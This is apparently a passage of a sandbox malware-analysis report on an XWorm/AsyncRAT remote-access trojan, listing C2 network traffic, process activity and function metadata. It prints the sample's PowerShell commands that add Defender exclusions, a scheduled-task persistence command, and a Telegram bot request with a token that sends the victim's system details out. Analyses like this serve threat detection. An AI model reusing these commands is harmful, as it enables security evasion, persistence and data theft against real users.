Sep 25, 2024 14:06:56.529968977 CEST	49728	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:57.443892002 CEST	49728	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:57.445050955 CEST	49729	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:57.450229883 CEST	7000	49728	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:57.451332092 CEST	7000	49729	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:57.451432943 CEST	49729	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:57.467829943 CEST	49729	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:57.474960089 CEST	7000	49729	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:59.141911030 CEST	7000	49729	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:59.141984940 CEST	49729	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:59.256428003 CEST	49729	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:59.257476091 CEST	49730	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:59.261503935 CEST	7000	49729	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:59.262283087 CEST	7000	49730	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:59.262365103 CEST	49730	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:59.275926113 CEST	49730	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:59.282128096 CEST	7000	49730	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:00.922647953 CEST	7000	49730	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:00.922753096 CEST	49730	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:00.932410002 CEST	49730	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:00.935286045 CEST	49731	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:00.941556931 CEST	7000	49730	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:00.944900036 CEST	7000	49731	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:00.945004940 CEST	49731	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:01.011630058 CEST	49731	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:01.021642923 CEST	7000	49731	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:02.629420996 CEST	7000	49731	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:02.629542112 CEST	49731	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:02.631424904 CEST	49731	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:02.633215904 CEST	49732	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:02.636168003 CEST	7000	49731	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:02.639094114 CEST	7000	49732	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:02.639192104 CEST	49732	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:02.653676987 CEST	49732	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:07:02.659568071 CEST	7000	49732	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:04.314841032 CEST	7000	49732	185.196.10.235	192.168.2.7
Sep 25, 2024 14:07:04.315007925 CEST	49732	7000	192.168.2.7	185.196.10.235

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 14:05:58.949219942 CEST	51097	53	192.168.2.7	1.1.1.1
Sep 25, 2024 14:05:58.956774950 CEST	53	51097	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2024 14:05:58.949219942 CEST	192.168.2.7	1.1.1.1	0xcbb2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 25, 2024 14:05:58.956774950 CEST	1.1.1.1	192.168.2.7	0xcbb2	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49705	149.154.167.220	443	7300	C:\Users\user\Desktop\Or3dzp4vB1.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 12:05:59 UTC	443	OUT	GET /bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A14ADFDFE8FE6B38195AF%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209YUNKW3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%200720 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-25 12:06:00 UTC	344	IN	HTTP/1.1 403 Forbidden Server: nginx/1.18.0 Date: Wed, 25 Sep 2024 12:05:59 GMT Content-Type: application/json Content-Length: 84 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-25 12:06:00 UTC	84	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}

Target ID:	0
Start time:	08:05:01
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\Or3dzp4vB1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Or3dzp4vB1.exe"
Imagebase:	0xa80000
File size:	81'920 bytes
MD5 hash:	A1880883FF14F58135FC2DB22F46A8AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	08:05:01
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:05:01
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:05:07
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:05:07
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:05:18
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:05:18
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:12:18
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:12:18
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:12:39
Start date:	25/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW"
Imagebase:	0x7ff6d3e90000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:12:39
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:12:41
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\0720XW
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\0720XW
Imagebase:	0x690000
File size:	81'920 bytes
MD5 hash:	A1880883FF14F58135FC2DB22F46A8AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\0720XW, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\0720XW, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\0720XW, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:12:51
Start date:	25/09/2024
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\OpenWith.exe -Embedding
Imagebase:	0x7ff63c480000
File size:	123'984 bytes
MD5 hash:	E4A834784FA08C17D47A1E72429C5109
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:12:52
Start date:	25/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	09:13:00
Start date:	25/09/2024
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\OpenWith.exe -Embedding
Imagebase:	0x7ff63c480000
File size:	123'984 bytes
MD5 hash:	E4A834784FA08C17D47A1E72429C5109
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:13:01
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\0720XW
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\0720XW
Imagebase:	0x7c0000
File size:	81'920 bytes
MD5 hash:	A1880883FF14F58135FC2DB22F46A8AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	21.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAACCB30C9 Relevance: 23.8, Strings: 18, Instructions: 1336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6, xrefs: 00007FFAACCB3F85
6, xrefs: 00007FFAACCB3D4F
6, xrefs: 00007FFAACCB3DB8
6, xrefs: 00007FFAACCB34B7
6, xrefs: 00007FFAACCB36B4
6, xrefs: 00007FFAACCB3CD4
6, xrefs: 00007FFAACCB40E0
6, xrefs: 00007FFAACCB414D
6, xrefs: 00007FFAACCB3423
6, xrefs: 00007FFAACCB44E3
6, xrefs: 00007FFAACCB4060
6, xrefs: 00007FFAACCB3E21
6, xrefs: 00007FFAACCB44EB
6, xrefs: 00007FFAACCB41BC
6, xrefs: 00007FFAACCB3FEC
6, xrefs: 00007FFAACCB3C5D
6, xrefs: 00007FFAACCB3612
6, xrefs: 00007FFAACCB3570

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID: 6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6
API String ID: 0-3518654800
Opcode ID: 1c9a6ff727e352f8bfdff5fa6951ec8cd643a378dd5d06fcd15d986e0c3f9fdf
Instruction ID: 6598b715c217ee816859a2f581701fefda410409abdcf0118d475806842aba2b
Opcode Fuzzy Hash: 1c9a6ff727e352f8bfdff5fa6951ec8cd643a378dd5d06fcd15d986e0c3f9fdf
Instruction Fuzzy Hash: 90A273B0A18B098FE758EF68C4997B9B7E2FF98304F1445B9E44DD3292DF34A8418741

Function 00007FFAACCB3ABD Relevance: 20.7, Strings: 16, Instructions: 675
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6, xrefs: 00007FFAACCB3F85
6, xrefs: 00007FFAACCB3D4F
6, xrefs: 00007FFAACCB3DB8
6, xrefs: 00007FFAACCB3CD4
6, xrefs: 00007FFAACCB40E0
6, xrefs: 00007FFAACCB414D
6, xrefs: 00007FFAACCB3B5F
6, xrefs: 00007FFAACCB4060
6, xrefs: 00007FFAACCB3E21
!, xrefs: 00007FFAACCB3AE3
%, xrefs: 00007FFAACCB3BAA
6, xrefs: 00007FFAACCB41BC
B, xrefs: 00007FFAACCB426D
6, xrefs: 00007FFAACCB3AF3
6, xrefs: 00007FFAACCB3FEC
6, xrefs: 00007FFAACCB3C5D

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID: 6$6$6$6$6$6$6$6$6$6$6$6$6$!$%$B
API String ID: 0-2207412630
Opcode ID: 491dc9b5e10fc3daabb1391a5f616bcec99b53728f3e087c5e1ae99cb7445230
Instruction ID: 83575027ca00aa8eda555b846b4da0a30647e2e7aa88d33e9902b886c3d82906
Opcode Fuzzy Hash: 491dc9b5e10fc3daabb1391a5f616bcec99b53728f3e087c5e1ae99cb7445230
Instruction Fuzzy Hash: 2F3262B0A18A098BEB48DF69D8997B9BBE1FF98310F1445BDE04DD3292CF34A8458741

Function 00007FFAACCB3A96 Relevance: 19.4, Strings: 15, Instructions: 670
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6, xrefs: 00007FFAACCB3F85
6, xrefs: 00007FFAACCB3D4F
6, xrefs: 00007FFAACCB3DB8
6, xrefs: 00007FFAACCB3CD4
6, xrefs: 00007FFAACCB40E0
6, xrefs: 00007FFAACCB414D
6, xrefs: 00007FFAACCB3B5F
6, xrefs: 00007FFAACCB4060
6, xrefs: 00007FFAACCB3E21
%, xrefs: 00007FFAACCB3BAA
6, xrefs: 00007FFAACCB41BC
B, xrefs: 00007FFAACCB426D
6, xrefs: 00007FFAACCB3AF3
6, xrefs: 00007FFAACCB3FEC
6, xrefs: 00007FFAACCB3C5D

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID: 6$6$6$6$6$6$6$6$6$6$6$6$6$%$B
API String ID: 0-1092029383
Opcode ID: 4a52afd8ed9e5eb054ffd9cb16c68c4da1d786120727cdb5bdf4117371fc9132
Instruction ID: 56b9aa32839896f1b8e3feef20ea9ca862d18709a60f3cf5ddb8304954b66e6c
Opcode Fuzzy Hash: 4a52afd8ed9e5eb054ffd9cb16c68c4da1d786120727cdb5bdf4117371fc9132
Instruction Fuzzy Hash: 173262B0A18A098FEB48DF69D8997B9BBE1FF98310F1445BDD04DD3292DF34A8458741

Function 00007FFAACCB1A66 Relevance: 6.8, Strings: 5, Instructions: 567
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"r, xrefs: 00007FFAACCB1CC7
6, xrefs: 00007FFAACCB1E8C
6, xrefs: 00007FFAACCB1D60
6, xrefs: 00007FFAACCB1CA3
6, xrefs: 00007FFAACCB1DF0

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID: 6$6$6$6$"r
API String ID: 0-3979851792
Opcode ID: 4c5ce152f6a95d733bb644e3c29e070de5ea1bd17cdd14164ff8e254e5cf6faa
Instruction ID: 1339e6cbec766155cab786b32b08b71da068eafed28ec794b2f51b0f288e008c
Opcode Fuzzy Hash: 4c5ce152f6a95d733bb644e3c29e070de5ea1bd17cdd14164ff8e254e5cf6faa
Instruction Fuzzy Hash: FA02F5A1B28A458FF798EB7C9459779B7D2FF99700F4445B9D04EC3293DE28E8058382

Function 00007FFAACCB21D1 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAACCB2292

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: e3dafca44abcbdd2e6de7bd40264cc2140de9c12f589d4840c79c971ceac1ac0
Instruction ID: 57eb0549731b852e02b86d24c83f9093ff6d501a478fbef91a14e78bde250da7
Opcode Fuzzy Hash: e3dafca44abcbdd2e6de7bd40264cc2140de9c12f589d4840c79c971ceac1ac0
Instruction Fuzzy Hash: 42518761B0E6C58FD786AB788865675BFD4DF87215B0804FAE0CCC7193ED189C0AC382

Function 00007FFAACCBA0E6 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456711fc5ed98511e94a09950369e1c5a882067803da7184831ec170af652317
Instruction ID: 7a2632661abe1952c46a687e5106189c838bb3d15eb22408278070ef5ce9149a
Opcode Fuzzy Hash: 456711fc5ed98511e94a09950369e1c5a882067803da7184831ec170af652317
Instruction Fuzzy Hash: B9F1C670918A8D8FEBA8DF68C8457E977E1FF55310F04826EE84DC7292DB34D9458B82

Function 00007FFAACCBAE92 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff25d4a954ffe7934622d15659af0730bad829ef00cb30af0afd4c82ecc6c801
Instruction ID: 7851994ad74aa43ea347d3541e9430d47d35be7cd3982193325557684d830516
Opcode Fuzzy Hash: ff25d4a954ffe7934622d15659af0730bad829ef00cb30af0afd4c82ecc6c801
Instruction Fuzzy Hash: AEE1D270908A4E8FEBA8DF28D8557E977D1EF55310F10826AD84DC7292DF78E8458BC1

Function 00007FFAACCB13A5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/O_^, xrefs: 00007FFAACCB1501

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID: /O_^
API String ID: 0-321099745
Opcode ID: dd5eeedb8f280b37d8a8913f5b52fc2cf9821a8a376b46de77aa067ac8955a40
Instruction ID: 4ccaa92dd7c270163b0d080631261ba352b6ba67e959d9085be62ee425010d5a
Opcode Fuzzy Hash: dd5eeedb8f280b37d8a8913f5b52fc2cf9821a8a376b46de77aa067ac8955a40
Instruction Fuzzy Hash: A38147A290E7C18FE3159B6DE8152F97FD0DF92220B0841BBD0CEC7587DA54984AC7E6

Function 00007FFAACCB13E0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFAACCB49C2

Strings

/O_^, xrefs: 00007FFAACCB1501

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID: CriticalProcess
String ID: /O_^
API String ID: 2695349919-321099745
Opcode ID: c8b9900872e264c004375e96142913f0e280373aa9053355ffbbfe2a4b91d74d
Instruction ID: 9a596cff6b0a7a6b103564887df12a01fb6d18702ead823c7598295a692e5bc4
Opcode Fuzzy Hash: c8b9900872e264c004375e96142913f0e280373aa9053355ffbbfe2a4b91d74d
Instruction Fuzzy Hash: B0712A6290D7818FE3199B6DE8052F97FD0EF92321B0841BBD0CEC7587DA64984AC7E5

Function 00007FFAACCB48ED Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFAACCB49C2

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: c8fa1ef38af748edbac91a589f22c2399c9bf97586412a823fdb8318d91d8cae
Instruction ID: f24301894df7832e0548b996d5bf9e8fdc13e16b53bbb75bfa008a9373eaff1c
Opcode Fuzzy Hash: c8fa1ef38af748edbac91a589f22c2399c9bf97586412a823fdb8318d91d8cae
Instruction Fuzzy Hash: A141E37180C7588FDB18DFA8D845AE9BBF0EF56311F04416EE08AD3692CB74A846CB91

Function 00007FFAACCB4C18 Relevance: 1.6, APIs: 1, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFAACCB4CE1

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 1b4600db9300d4ecb07ba0cbcefbbf1aa18b5add0c23f97f0850be6dd116af95
Instruction ID: 66974c06fcbecc2a7b007009f6f522b3a21a502d703dd180861d5b54ce4e3372
Opcode Fuzzy Hash: 1b4600db9300d4ecb07ba0cbcefbbf1aa18b5add0c23f97f0850be6dd116af95
Instruction Fuzzy Hash: 9031E57191CA5D8FEB58DF68D8066B9BBE1EF59321F00427ED00DC3292DE64A85687C1

Non-executed Functions

Function 00007FFAACCB9299 Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452cb59ef0cdb3320c69ce5ca87310d28afa68ab4bca0801a74d23682df97036
Instruction ID: bb5a30952435a5adab8863199a4407de3b3bcf8e0402bcbed8424d067e14ced0
Opcode Fuzzy Hash: 452cb59ef0cdb3320c69ce5ca87310d28afa68ab4bca0801a74d23682df97036
Instruction Fuzzy Hash: AFD1E57090D64C8FDB59DB68D846BEDBBB1FF56310F1042AAD04DD7292DB34A845CB81

Function 00007FFAACCB9725 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d95d8195318a6269a82f72004923b74938e1f1416761df745fef4a777a783f9
Instruction ID: 9a9f9c425783edd9f17e0453eaf4c2f0312232d10af65c5d44168f4ec29caf90
Opcode Fuzzy Hash: 6d95d8195318a6269a82f72004923b74938e1f1416761df745fef4a777a783f9
Instruction Fuzzy Hash: 4CC1B37090C64C8FDB59DBA8D849AE9BBF1EF56321F0442AFD04DD3292DB74A845CB81

Function 00007FFAACCB7839 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID:
API String ID:
